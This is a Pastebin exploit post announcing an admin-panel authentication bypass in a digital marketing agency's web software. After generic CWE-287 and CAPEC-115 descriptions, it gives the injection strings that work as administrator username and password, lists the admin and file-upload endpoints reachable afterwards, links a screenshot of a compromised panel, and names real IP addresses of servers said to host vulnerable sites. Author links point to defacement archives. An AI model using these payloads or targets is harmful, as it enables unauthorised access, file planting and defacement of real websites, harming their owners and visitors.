Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Sharptech Digital Marketing Agency Authentication Bypass
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 13/12/2020
- # Vendor Homepage : sharptechcompany.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-287 [ Improper Authentication ]
- CAPEC-115 [ Authentication Bypass ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
- zone-h.org/archive/notifier=CyBeRiZM
- # Pastebin : pastebin.com/u/KingSkrupellos
- ####################################################################
- # Impact :
- ***********
- CWE-287 [ Improper Authentication ]
- ************************************
- Authentication is any process by which a system verifies the identity of a user who wishes
- to access it.When an actor claims to have a given identity, the software does not
- prove or insufficiently proves that the claim is correct. Improper authentication
- occurs when an application improperly verifies the identity of a user.
- A software incorrectly validates user's login information and as a result, an attacker can
- gain certain privileges within the application or disclose sensitive information that allows
- them to access sensitive data and provoke arbitrary code execution.
- The weakness is introduced during Architecture and Design, Implementation stages.
- CAPEC-115 [ Authentication Bypass ]
- *************************************
- An attacker gains access to application, service, or device with the privileges
- of an authorized or privileged user by evading or circumventing an authentication mechanism.
- The attacker is therefore able to access protected data without authentication ever having taken place.
- This refers to an attacker gaining access equivalent to an authenticated user without ever going
- through an authentication procedure. This is usually the result of the attacker using an unexpected
- access procedure that does not go through the proper checkpoints where authentication should occur.
- For example, a web site might assume that all users will click through a given link in order to get to
- secure material and simply authenticate everyone that clicks the link. However, an attacker might be
- able to reach secured web content by explicitly entering the path to the content rather than clicking
- through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
- other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
- faking authentication by exploiting flaws or by stealing credentials from legitimate users.
- ####################################################################
- # Authentication Bypass / Improper Authentication /
- Admin Panel Login Bypass Exploit / File Upload => Unauthorized File Insert
- ******************************************************************
- Administrator Username : '=''or'
- Administrator Password : '=''or'
- /admin/home.php#
- /admin/add-menu.php
- /admin/add-submenu.php
- /admin/add-sub-pdf.php
- /admin/upload-pdf.php
- /admin/add-contact.php
- /admin/add-banner.php
- /admin/add-logo.php
- /admin/add-curnews.php
- /admin/view-menu.php
- /admin/view-submenu.php
- /admin/view-sub-pdf.php
- /admin/view-upload-pdf.php
- /admin/view-curnews.php
- /admin/change_pwd.php
- ScreenShot Proof Administrator Control Panel =>
- https://www.upload.ee/image/12633382/sharptechadminpanelcxsec12-12-2020.png
- Example Vulnerable IP Addresses and Websites =>
- Reverse IP results for (103.21.58.15)
- There are 2,433 domains hosted on this server.
- Reverse IP results for (103.21.58.60)
- There are 1,987 domains hosted on this server.
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment